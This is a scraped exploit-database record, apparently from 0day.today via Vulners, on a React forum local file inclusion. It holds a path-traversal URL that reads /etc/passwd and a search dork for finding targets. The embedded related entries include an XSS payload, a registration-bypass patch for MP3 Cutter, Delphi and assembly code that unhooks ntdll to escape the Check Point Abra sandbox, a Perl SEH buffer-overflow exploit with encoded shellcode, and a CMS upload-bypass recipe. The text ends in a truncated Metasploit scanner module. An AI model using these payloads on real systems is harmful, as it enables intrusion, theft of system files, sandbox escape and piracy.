ID 1337DAY-ID-11514
Type zdt
Reporter SNK
Modified 2010-03-30T00:00:00
Description
Exploit for the PHP platform in the web applications category
=================================================
React software local file inclusion Vulnerability
=================================================
React software [local file inclusion]
- date: 29.03.2010
- author: SNK
- language: php
- page: http://react.nl
- vuln: http://page/forum/list_message/index.php?action=../../../../../../../../../../../../../etc/passwd%00
- dork: Powered by React - www.react.nl
# 0day.today [2018-02-27] #
{"published": "2010-03-30T00:00:00", "id": "1337DAY-ID-11514", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T02:26:49", "bulletin": {"published": "2010-03-30T00:00:00", "id": "1337DAY-ID-11514", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 2.6, "modified": "2016-04-19T02:26:49"}}, "hash": "8fc12c1b1889dd337d78d58046e93158878a09a1fe1ebc93b9462a3edad8b119", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T02:26:49", "edition": 1, "title": "React software local file inclusion Vulnerability", "href": "http://0day.today/exploit/description/11514", "modified": "2010-03-30T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/11514", "references": [], "reporter": "SNK", "sourceData": "=================================================\r\nReact software local file inclusion Vulnerability\r\n=================================================\r\n\r\nReact software [local file inclusion]\r\n \r\n- date: 29.03.2010\r\n \r\n- author: SNK\r\n- language: php\r\n- page: http://react.nl\r\n- vuln: http://page/forum/list_message/index.php?action=../../../../../../../../../../../../../etc/passwd%00\r\n- dork: Powered by React - www.react.nl\r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "04c78c4d1282ac0ac43e8bed558f7313", "key": "sourceData"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "bbe65366bfd6d96ebacd1b3d59662a12", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "0803d5d168c716e71a3f12fee71d0c7e", "key": "href"}, {"hash": "682a6ef41c7b593eb6f87d7a3be49607", "key": "published"}, {"hash": "214f59e4092db334832c6fc343a26bd9", "key": "sourceHref"}, {"hash": 
"d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "888c810137fa148866cb9a08cbcb66c0", "key": "reporter"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "682a6ef41c7b593eb6f87d7a3be49607", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "9d7846ef88f385c960c6fed81338543d86c91c9b4fd350518e57d2db987b91df", "enchantments": {"score": {"value": -0.8, "vector": "NONE", "modified": "2018-02-28T01:35:08"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-32634", "1337DAY-ID-32638", "1337DAY-ID-18945", "1337DAY-ID-8156", "1337DAY-ID-2050"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SCADA/PROFINET_SIEMENS", "MSF:AUXILIARY/SCANNER/SAP/SAP_SOAP_TH_SAPREL_DISCLOSURE", "MSF:AUXILIARY/SCANNER/AFP/AFP_SERVER_INFO", "MSF:AUXILIARY/SCANNER/NATPMP/NATPMP_PORTSCAN", "MSF:AUXILIARY/SCANNER/ORACLE/SID_BRUTE", "MSF:AUXILIARY/SCANNER/SNMP/SNMP_ENUM", "MSF:AUXILIARY/SCANNER/SSH/SSH_VERSION", "MSF:AUXILIARY/SCANNER/PORTSCAN/FTPBOUNCE"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11514", "SECURITYVULNS:VULN:5799", "SECURITYVULNS:DOC:11514"]}], "modified": "2018-02-28T01:35:08"}, "vulnersScore": -0.8}, "type": "zdt", "lastseen": "2018-02-28T01:35:08", "edition": 2, "title": "React software local file inclusion Vulnerability", "href": "https://0day.today/exploit/description/11514", "modified": "2010-03-30T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/11514", "references": [], "reporter": "SNK", "sourceData": "=================================================\r\nReact software local file inclusion Vulnerability\r\n=================================================\r\n\r\nReact software [local file inclusion]\r\n \r\n- date: 29.03.2010\r\n \r\n- author: SNK\r\n- language: php\r\n- page: 
http://react.nl\r\n- vuln: http://page/forum/list_message/index.php?action=../../../../../../../../../../../../../etc/passwd%00\r\n- dork: Powered by React - www.react.nl\r\n\r\n\n\n# 0day.today [2018-02-27] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "1071d166ab53f7bc9350db948fc8b392", "key": "href"}, {"hash": "682a6ef41c7b593eb6f87d7a3be49607", "key": "modified"}, {"hash": "682a6ef41c7b593eb6f87d7a3be49607", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "888c810137fa148866cb9a08cbcb66c0", "key": "reporter"}, {"hash": "c75f7910abb7bd0230d461e3c354f628", "key": "sourceData"}, {"hash": "3772f0e5824247cd17aed7453963e45a", "key": "sourceHref"}, {"hash": "bbe65366bfd6d96ebacd1b3d59662a12", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2019-05-02T03:55:32", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category web applications", "modified": "2019-05-01T00:00:00", "published": "2019-05-01T00:00:00", "id": "1337DAY-ID-32638", "href": "https://0day.today/exploit/description/32638", "title": "Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Stored XSS)\r\n# Exploit Author: Seyed Sadegh Khatami\r\n# Website: https://www.cert.ir\r\n# Vendor Homepage: https://www.veeam.com/\r\n# Software Link: https://www.veeam.com/virtual-server-management-one-free.html\r\n# Version: 9.5.0.3201\r\n# Tested on: Windows Server 2016\r\n\r\n\r\n#exploit:\r\n\r\nPath: /CommonDataHandlerReadOnly.ashx \r\n\r\nmethod: addDashboard / editDashboard\r\n\r\nSET Description(config) field to \u201cAAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>\u201d\n\n# 0day.today [2019-05-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32638"}, {"lastseen": "2018-01-09T17:14:50", "bulletinFamily": "exploit", "description": "MP3 Cutter is a Windows desktop utility allows you to cut and split a big MP3 or video to small audio pieces. \rWith MP3 Cutter, you can split and cut not only MP3 format, but also WMA, WAV, AMR, WMV, AVI, MPG, 3GP, MP4, FLAC, \rOGG, WMV, MOV and more than 40 audio & video formats. 
\r (Copy of the Vendor Homepage: http://www.mp3cutter.org/)\r", "modified": "2016-10-22T00:00:00", "published": "2016-10-22T00:00:00", "href": "https://0day.today/exploit/description/25959", "id": "1337DAY-ID-25959", "type": "zdt", "title": "MP3 Cutter 1.1.0 - Reverse Engineering ByPass Registration Vulnerability", "sourceData": "Technical Details & Description:\r\n================================\r\nA Reverse Enginering Vulnerability has been discovered in the official MP3 Cutter v1.1.0 software.\r\n\r\nAn attacker could make the software completely free MP3 Cutter manipulating conditoinel jumps and bypass security registration code to back any password and validated registration.\r\n\r\nVulnerable Input(s):\r\n\t\t\t[+] Registration Code\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nA Reverse Enginering Vulnerability can be exploited by local attackers with low privileged system user account.\r\nFor security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.\r\n\r\nManual steps to reproduce the vulnerability ...\r\n1. Debug MP3 Cutter.exe\r\n2. Find the string \"Invaild Serial Code\"\r\n3. Replace the conditional jump \"JMP\" in \"JNZ\"\r\n4. Save the changes made and save the executable\r\n5. Run the software you have changed\r\n6. Click \"Register MP3 Cutter now\"\r\n7. Enter any code in \"Input Registration Code\" eg 12345 and click \"OK\"\r\n8. 
BOOMM Registration Hijacked.\r\n\r\n--- PoC : Exploit ---\r\n0067C193 E9 5A010000 JMP MP3Cutte.0067C2F2 <-- Handle the conditional jump JMP to (JNZ MP3Cutte.0067C2F2)\r\n0067C198 C745 FC 13000000 MOV DWORD PTR SS:[EBP-4],13\r\n0067C19F C785 60FFFFFF 04>MOV DWORD PTR SS:[EBP-A0],80020004\r\n0067C1A9 C785 58FFFFFF 0A>MOV DWORD PTR SS:[EBP-A8],0A\r\n0067C1B3 C785 70FFFFFF 04>MOV DWORD PTR SS:[EBP-90],80020004\r\n0067C1BD C785 68FFFFFF 0A>MOV DWORD PTR SS:[EBP-98],0A\r\n0067C1C7 C785 40FFFFFF 38>MOV DWORD PTR SS:[EBP-C0],MP3Cutte.005BE>; UNICODE \"Invaild\"\r\n0067C1D1 C785 38FFFFFF 08>MOV DWORD PTR SS:[EBP-C8],8\r\n0067C1DB 8D95 38FFFFFF LEA EDX,DWORD PTR SS:[EBP-C8]\r\n0067C1E1 8D8D 78FFFFFF LEA ECX,DWORD PTR SS:[EBP-88]\r\n0067C1E7 E8 3271D8FF CALL <JMP.&MSVBVM60.__vbaVarDup>\r\n0067C1EC C785 50FFFFFF 08>MOV DWORD PTR SS:[EBP-B0],MP3Cutte.005BE>; UNICODE \"Invaild Serial Code.\"\r\n\r\n\r\n[+] Disclaimer [+]\r\n===================\r\nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.\r\nThe author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.\r\n\r\n\r\nDomain: www.zwx.fr\r\nContact: [email\u00a0protected]\t\r\nSocial: twitter.com/XSSed.fr\r\nFeeds: www.zwx.fr/feed/\r\nAdvisory: www.vulnerability-lab.com/show.php?user=ZwX\r\n packetstormsecurity.com/files/author/12026/\r\n cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/\r\n 0day.today/author/27461\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/25959", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-03T21:40:16", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2012-07-10T00:00:00", "published": "2012-07-10T00:00:00", "id": "1337DAY-ID-18945", "href": "https://0day.today/exploit/description/18945", "type": "zdt", "title": "Checkpoint Abra Multiple Vulnerabilities", "sourceData": "#############################################################################\r\nCheck Point Abra Vulnerabilities\r\n \r\nVendor: Check Point Software Technologies Ltd\r\nProduct web page: http://rus.checkpoint.com/products/abra/index.html; http://www.checkpoint.com/products/go/\r\nPlatforms: Windows XP, Vista, 7 (32 bit)\r\n \r\nSummary: Check Point Abra allows you to create a secure virtual workspace on any PC, this solution may significantly affect the way of organizing the work of mobile employees. With Abra solutions you can easily turn any PC into a fully secure workplace, so you no longer need to carry bulky laptops or heavy folders. Convenient USB-drive form factor body allows you to quickly create a virtual workplace, while the virtualization technology and built-in encryption ensures the mobile data safety. 
Abra provides users with protection when working in offline mode by an encrypted USB-drive, and online - through VPN client software.\r\n \r\nDescription: Imperfect control modules and data monitoring application allows you to run any file, bypassing the current policy around virtualization, and read\\write data from an isolated Abra session directly into the PC operating system, conduct phishing attacks, etc.\r\n \r\n#############################################################################\r\n \r\nRun third-party software in a secure session:\r\n \r\nControl rules used applications are in the file\r\nX:\\PWC\\data\\sandbox-persistence.ref (\u0438 X:\\PWC\\data\\ swspogo.xml, F:\\PWC\\data\\ ISWPolicy.xml, X:\\PWC\\data\\ ics_policy.xml). Any application not from the white list will not be able to perform when working in a secure session.\r\n \r\nAs part of the session is allowed to run the pre-installed software: Internet Explorer, Notepad, Calculator, Office, Remote Desktop Connection (+ Portable Apps) to use system utilities, and host machines that are clearly indicated in the configuration file F:\\PWC\\data\\sandbox-persistence.ref.\r\n \r\nExample:\r\n \r\n<Execute OriginalName=\"calc.exe\" PathName=\"\\calc.exe\" AppName=\"Microsoft Calculator\" UIDescription=\"Microsoft Calculator\" id=\"134\"/>\r\nApplication Control session examines the application run only on paths, file names, as well as record VersionInfo in the file.\r\n \r\nThis implies you can import an arbitrary application and run it to bypass the control policy of applications. This is implemented by changing the file name and the field in the resource OriginalFilename VERSIONINFO on any of the white list. 
Moreover, the user may replace any executable file (eg archiver WinRar) to the host OS without any imports into the secure session and the file will automatically be filled in a secure session (run by the correspondences of extensions, or from the \"start\" menu).\r\n \r\nIt is also possible to substitute the system default software from the session \"Start\" menu (Internet Explorer, Notepad, Calculator, File Protection is off to the host OS, you need administrator rights). The substitution of system files can be implemented after disabling File Protection Windows File Protection with a call to the fifth ordinal of exported file system sfc_os.dll functions (windows xp), sample code:\r\n \r\n hInst := LoadLibrary('sfc_os.dll');\r\n proc := GetProcAddress(hInst, ordinal 5);\r\n filename := 'c:\\windows\\system32\\calc.exe';\r\n asm\r\n push -1\r\n push filename\r\n push 0\r\n call proc\r\n end\r\n \r\nEither by modifying the rights to the file (Vista and above):\r\ntakeown /f <\u0438\u043c\u044f_\u0444\u0430\u0439\u043b\u0430>\r\nicacls <\u0438\u043c\u044f_\u0444\u0430\u0439\u043b\u0430> /grant %username%:F\r\nicacls <\u0438\u043c\u044f_\u0444\u0430\u0439\u043b\u0430> /grant *S-1-1-0:(F)\r\n \r\nIt is also well executed Bat-files downloaded from the host computer\u2019s folder called \"Downloaded from PC\", or any other.\r\n \r\nThe structure of the boot process and secure session:\r\n \r\nDuring the secure session creates a separate process group. Executable files and libraries are the product of two assemblies 32 and 64-bit. But despite this, the 64-bit systems still run a few 32-bit modules in the X folder: \\ Go \\ PWC \\ WoW64.\r\n \r\nThe second copy process launches the ISWMGR.exe Explorer explorer.exe processes, which is the parent of all, offered in a secure session of external tools and imported programs.\r\n \r\nWhen starting the imported files in a secure session they run a separate application-boot X: \\ PWC \\ WOW64 \\ ISWLDR.dat. 
He, in turn, loads the library ISWUL.dll, causing the function to set InitHook interceptions. Installed hooks calling functions for working with files, the registry, the clipboard, cryptography, etc:\r\n \r\nHANDLE (__stdcall *__cdecl GetAddrOf_SetClipboardData())(UINT, HANDLE)\r\n{\r\n HANDLE (__stdcall *result)(UINT, HANDLE); // [email\u00a0protected]\r\n \r\n result = SetClipboardData;\r\n addr_SetClipboardData = SetClipboardData;\r\n return result;\r\n}\r\n \r\nint __cdecl hooks_Clipboard()\r\n{\r\n int v0; // [email\u00a0protected]\r\n int v1; // [email\u00a0protected]\r\n int v2; // [email\u00a0protected]\r\n int v3; // [email\u00a0protected]\r\n int result; // [email\u00a0protected]\r\n \r\n v0 = splice_func(addr_SetClipboardData, callback_SetClipboardData);\r\n if ( v0 )\r\n addr_SetClipboardData = v0;\r\n v1 = splice_func(addr_GetClipboardData, callback_GetClipboardData);\r\n if ( v1 )\r\n addr_GetClipboardData = v1;\r\n v2 = splice_func(addr_OpenClipboard, callback_OpenClipboard);\r\n if ( v2 )\r\n addr_OpenClipboard = v2;\r\n v3 = splice_func(addr_EmptyClipboard, callback_EmptyClipboard);\r\n if ( v3 )\r\n addr_EmptyClipboard = v3;\r\n result = splice_func(addr_CloseClipboard, callback_CloseClipboard);\r\n if ( result )\r\n addr_CloseClipboard = result;\r\n return result;\r\n}\r\n \r\nIt is possible to bypass interceptor functions by their release (recovery of the original code functions as it was before the modification) - direct reading from a file system folder (for the use of technology before the reading system files must be copied to a temporary folder and install a structured exception handler), such as ntdll.dll, read the first 10-15 bytes of the function from the file and overwrite the buffer was read the prologue of the corresponding function in the memory (which is the function of the jump-hook, for example ZwLoadDriver).\r\n \r\nTechnique, for example, can allow making changes to files \\ Registry of the secure session directly to the host 
system.\r\n \r\nprocedure resolve_APIs_from_dll_images(mapped_dll_base: pointer; dllname: string);\r\nvar\r\nvar_4, var_8, var_10, var_20, var_24, var_2C, var_28, var_3C, var_1C, dllbase, Src, old: DWORD;\r\nbegin\r\nasm\r\n pushad\r\n mov eax, [mapped_dll_base]\r\n mov ecx, [eax+3Ch]\r\n mov edx, [mapped_dll_base]\r\n lea eax, [edx+ecx+18h]\r\n mov [var_10], eax\r\n mov ecx, [var_10]\r\n mov edx, [mapped_dll_base]\r\n add edx, [ecx+60h]\r\n mov [var_4], edx\r\n mov eax, [var_4]\r\n mov ecx, [mapped_dll_base]\r\n add ecx, [eax+1Ch]\r\n mov [var_8], ecx\r\n mov ecx, [var_4]\r\n mov edx, [mapped_dll_base]\r\n add edx, [ecx+20h]\r\n mov [var_20], edx\r\n mov eax, [var_4]\r\n mov ecx, [mapped_dll_base]\r\n add ecx, [eax+24h]\r\n mov [var_2C], ec\r\n push dllname\r\n call LoadLibrary\r\n mov [var_28], eax\r\n cmp [var_28], 0\r\n jne @loc_41D111\r\n jmp @ending\r\n@loc_41D111:\r\n mov [var_24], 0\r\n jmp @loc_41D135\r\n@loc_41D11A:\r\n mov eax, [var_24]\r\n add eax, 1\r\n mov [var_24], eax\r\n mov ecx, [var_20]\r\n add ecx, 4\r\n mov [var_20], ecx\r\n mov edx, [var_2C]\r\n add edx, 2\r\n mov [var_2C], edx\r\n@loc_41D135:\r\n mov eax, [var_4]\r\n mov ecx, [var_24]\r\n cmp ecx, [eax+18h]\r\n jnb @ending\r\n mov ecx, [var_24]\r\n mov edx, [var_20]\r\n mov eax, [mapped_dll_base]\r\n add eax, [edx]\r\n mov ecx, [var_24]\r\n mov edx, [var_8]\r\n mov eax, [var_28]\r\n add eax, [edx+ecx*4]\r\n mov [var_3C], eax\r\n mov ecx, [var_24]\r\n mov edx, [var_8]\r\n mov eax, [mapped_dll_base]\r\n add eax, [edx+ecx*4]\r\n mov [Src], eax\r\n push 0Ah\r\n mov ecx, [Src]\r\n push ecx\r\n lea edx, [Dst]\r\n push edx\r\n call memcpy\r\n add esp, 0Ch\r\n lea eax, [old]\r\n push eax\r\n push PAGE_EXECUTE_READWRITE\r\n push 0Ah\r\n mov eax, [var_3C]\r\n push eax\r\n call VirtualProtect\r\n push 0Ah\r\n lea ecx, [Dst]\r\n push ecx\r\n mov eax, [var_3C]\r\n push eax\r\n call memcpy\r\n add esp, 0Ch\r\n jmp @loc_41D11A\r\n@ending:\r\n popad\r\nend;\r\nend;\r\n \r\nfunction UnHook(dllname: string): 
boolean;\r\nvar\r\n MapOffset: pointer;\r\n dll, filename: string;\r\n MapHandle, FileHandle: THandle;\r\nBegin\r\n dll := SystemDir + '\\' + dllname;\r\n filename := GetSpecialPath(CSIDL_APPDATA) + '\\' + dllname;\r\n result := CopyFile(PChar(dll), PChar(filename), false);\r\n if result then\r\n begin\r\n FileHandle := CreateFile(pChar(filename), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);\r\n If FileHandle <> INVALID_HANDLE_VALUE then\r\n Try\r\n MapHandle := CreateFileMapping(FileHandle, nil, $1000002, 0, 0, nil);\r\n If MapHandle <> 0 then\r\n Try\r\n MapOffset := MapViewOfFile(MapHandle, FILE_MAP_READ, 0, 0, 0);\r\n If MapOffset <> nil then\r\n Try\r\n resolve_APIs_from_dll_images(MapOffset, dllname);\r\n Finally\r\n UnmapViewOfFile(MapOffset);\r\n End;\r\n Finally\r\n CloseHandle(MapHandle);\r\n End;\r\n Finally\r\n CloseHandle(FileHandle);\r\n End;\r\n DeleteFile(filename);\r\n end;\r\nEnd;\r\n \r\nprocedure Write2File(filename, s: string);\r\nvar\r\nf: textfile;\r\nbegin\r\n assignfile(f, filename);\r\n rewrite(f);\r\n writeln(f, s);\r\n closefile(f);\r\nend;\r\n \r\nbegin\r\nUnHook('ntdll.dll');\r\n...\r\nWrite2File('c:\\users\\Administrator\\Desktop\\POC.txt', 'Now we writing to host OS');\r\nend;\r\n \r\n#############################################################################\r\n \r\nPossible implementation of a phishing attack by modifying the file etc \\ hosts host system, all changes in it are also automatically applied for the secure session.\r\n\r\n\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18945"}, {"lastseen": "2018-02-07T01:22:33", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category local exploits", "modified": "2009-11-17T00:00:00", "published": "2009-11-17T00:00:00", "id": "1337DAY-ID-8156", "href": "https://0day.today/exploit/description/8156", "type": "zdt", "title": "Icarus 2.0 (.pgn File) Universal Local Buffer 
Overflow Exploit (SEH)", "sourceData": "====================================================================\r\nIcarus 2.0 (.pgn File) Universal Local Buffer Overflow Exploit (SEH)\r\n====================================================================\r\n\r\n\r\n\r\n# Title: Icarus 2.0 (.pgn File) Universal Local Buffer Overflow Exploit (SEH)\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: D3V!L FUCK3R\r\n# Published: 2009-11-17\r\n# Verified: yes\r\n\r\nview source\r\nprint?\r\n#!/user/bin/perl\r\n#Icarus 2.0 (.PGn File)Universal Local BOF (SEH)\r\n#tested on win SP2\r\n#Author: germaya_x & D3v!LFUCK3R \r\n#Download :http://www.randomsoftware.com/pub/icarus.exe\r\n#GreTz [2] :his0k4 , Eddy_BAck0o , THE INJECTOR , ALL : www.lezr.com members :)\r\n#fuck To: RoMaNcYxHaCkEr & alnjm33 & ALL www.sec-war.com members :)\r\n#############################################################\r\nmy $bof=\"A\" x 332 ;\r\nmy $NEXT_sEh=\"\\xEB\\x06\\x90\\x90\";\r\nmy $SEH=\"\\x3F\\xB2\\x2E\\x66\";#hnetcfg.DLL\r\nmy $nop=\"\\x90\" x 20;\r\nmy 
$sec=\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34\".\r\n\"\\x42\\x50\\x42\\x50\\x42\\x30\\x4b\\x38\\x45\\x34\\x4e\\x43\\x4b\\x48\\x4e\\x47\".\r\n\"\\x45\\x30\\x4a\\x47\\x41\\x50\\x4f\\x4e\\x4b\\x48\\x4f\\x44\\x4a\\x41\\x4b\\x48\".\r\n\"\\x4f\\x55\\x42\\x52\\x41\\x30\\x4b\\x4e\\x49\\x54\\x4b\\x58\\x46\\x43\\x4b\\x38\".\r\n\"\\x41\\x50\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x49\\x4e\\x4a\\x46\\x48\\x42\\x4c\".\r\n\"\\x46\\x37\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\".\r\n\"\\x46\\x4f\\x4b\\x43\\x46\\x55\\x46\\x32\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x48\".\r\n\"\\x4f\\x35\\x46\\x32\\x41\\x30\\x4b\\x4e\\x48\\x56\\x4b\\x58\\x4e\\x30\\x4b\\x44\".\r\n\"\\x4b\\x58\\x4f\\x55\\x4e\\x31\\x41\\x50\\x4b\\x4e\\x4b\\x58\\x4e\\x51\\x4b\\x48\".\r\n\"\\x41\\x50\\x4b\\x4e\\x49\\x58\\x4e\\x55\\x46\\x42\\x46\\x30\\x43\\x4c\\x41\\x33\".\r\n\"\\x42\\x4c\\x46\\x36\\x4b\\x38\\x42\\x44\\x42\\x53\\x45\\x48\\x42\\x4c\\x4a\\x37\".\r\n\"\\x4e\\x30\\x4b\\x48\\x42\\x54\\x4e\\x30\\x4b\\x58\\x42\\x57\\x4e\\x51\\x4d\\x4a\".\r\n\"\\x4b\\x38\\x4a\\x36\\x4a\\x50\\x4b\\x4e\\x49\\x30\\x4b\\x48\\x42\\x48\\x42\\x4b\".\r\n\"\\x42\\x50\\x42\\x50\\x42\\x50\\x4b\\x48\\x4a\\x56\\x4e\\x33\\x4f\\x35\\x41\\x53\".\r\n\"\\x48\\x4f\\x42\\x56\\x48\\x45\\x49\\x38\\x4a\\x4f\\x43\\x58\\x42\\x4c\\x4b\\x57\".\r\n\"\\x42\\x35\\x4a\\x46\\x42\\x4f\\x4c\\x58\\x46\\x50\\x4f\\x55\\x4a\\x36\\x4a\\x59\".\r\n\"\\x50\\x4f\\x4c\\x38\\x50\\x50\\x47\\x35\\x4f\\x4f\\x47\\x4e\\x43\\x36\\x41\\x56\".\r\n\"\\x4e\\x56\\x43\\x46\\x42\\x30\\x5a\";\r\n###################################################################\r\nopen(my
file,'>> exploit.pgn');\r\nprint myfile $bof.$NEXT_sEh.$SEH.$nop.$sec;\r\n###################################################################\r\n\r\n\r\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8156"}, {"lastseen": "2018-01-03T00:59:31", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-07-27T00:00:00", "published": "2007-07-27T00:00:00", "id": "1337DAY-ID-2050", "href": "https://0day.today/exploit/description/2050", "type": "zdt", "title": "Seditio CMS <= v121 (pfs.php) Remote File Upload Vulnerability", "sourceData": "==============================================================\r\nSeditio CMS <= v121 (pfs.php) Remote File Upload Vulnerability\r\n==============================================================\r\n\r\n\r\n\r\n# Seditio CMS Remote File Upload Vulnerability\r\n\r\n# ReSearcher : A.D.T\r\n\r\n# Script : Seditio and Ldu Cms\r\n\r\n# Version : All Versions\r\n\r\n# Script HomePage : http://neocrome.net/\r\n\r\n# Dork : \"powered by seditio\" or \"powered by ldu\"\r\n\r\n# Risk : Very High!\r\n\r\n# Usage : Firstly, you register the victim web site. After, go to \"pfs.php\" and upload your evil script!\r\n\r\n# [+] Your Evil Script : evilscriptname.php.gif or evilscriptname.php.jpg or evilscriptname.php.png\r\n\r\n\r\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2050"}], "metasploit": [{"lastseen": "2019-12-15T05:01:39", "bulletinFamily": "exploit", "description": "This module will use Layer2 packets, known as Profinet Discovery packets, to detect all Siemens (and sometimes other) devices on a network. It is perfectly SCADA-safe, as there will only be ONE single packet sent out. Devices will respond with their IP configuration and hostnames. 
Created by XiaK Industrial Security Research Center (www[dot]xiak[dot]be))\n", "modified": "2017-07-24T13:26:21", "published": "2016-09-11T07:15:41", "id": "MSF:AUXILIARY/SCANNER/SCADA/PROFINET_SIEMENS", "href": "", "type": "metasploit", "title": "Siemens Profinet Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'packetfu'\n\nclass MetasploitModule < Msf::Auxiliary\n def initialize\n super(\n 'Name' => 'Siemens Profinet Scanner',\n 'Description' => %q{\n This module will use Layer2 packets, known as Profinet Discovery packets,\n to detect all Siemens (and sometimes other) devices on a network.\n It is perfectly SCADA-safe, as there will only be ONE single packet sent out.\n Devices will respond with their IP configuration and hostnames.\n Created by XiaK Industrial Security Research Center (www[dot]xiak[dot]be))\n },\n 'References' =>\n [\n [ 'URL', 'https://wiki.wireshark.org/PROFINET/DCP' ],\n [ 'URL', 'https://github.com/tijldeneut/ICSSecurityScripts' ]\n ],\n 'Author' => 'Tijl Deneut <tijl.deneut[at]howest.be>',\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptString.new('INTERFACE', [ true, 'Set an interface', 'eth0' ]),\n OptInt.new('ANSWERTIME', [ true, 'Seconds to wait for answers, set longer on slower networks', 2 ])\n ], self.class\n )\n end\n\n def hex_to_bin(s)\n s.scan(/../).map { |x| x.hex.chr }.join\n end\n\n def bin_to_hex(s)\n s.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join\n end\n\n def hexint_to_str(s)\n s.to_i(16).to_s\n end\n\n def hex_to_address(s)\n hexint_to_str(s[0..1]) + '.' + hexint_to_str(s[2..3]) + '.' + hexint_to_str(s[4..5]) + '.' 
+ hexint_to_str(s[6..7])\n end\n\n def parse_devicerole(role)\n arr = { \"01\" => \"IO-Device\", \"02\" => \"IO-Controller\", \"04\" => \"IO-Multidevice\", \"08\" => \"PN-Supervisor\" }\n return arr[role] unless arr[role].nil?\n 'Unknown'\n end\n\n def parse_vendorid(id)\n return 'Siemens' if id == '002a'\n 'Unknown'\n end\n\n def parse_deviceid(id)\n arr = { \"0a01\" => \"Switch\", \"0202\" => \"PC Simulator\", \"0203\" => \"S7-300 CPU\", \\\n \"0101\" => \"S7-300\", \"010e\" => \"S7-1500\", \"010d\" => \"S7-1200\", \"0301\" => \"HMI\", \\\n \"0403\" => \"HMI\", \"010b\" => \"ET200S\" }\n return arr[id] unless arr[id].nil?\n 'Unknown'\n end\n\n def parse_block(block, block_length)\n block_id = block[0..2 * 2 - 1]\n case block_id\n when '0201'\n type_of_station = hex_to_bin(block[4 * 2..4 * 2 + block_length * 2 - 1])\n print_line(\"Type of station: #{type_of_station}\")\n when '0202'\n name_of_station = hex_to_bin(block[4 * 2..4 